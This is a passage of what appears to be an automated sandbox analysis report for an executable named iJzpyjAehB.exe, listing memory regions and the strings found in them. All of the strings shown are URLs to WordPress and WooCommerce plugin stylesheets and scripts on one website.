00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 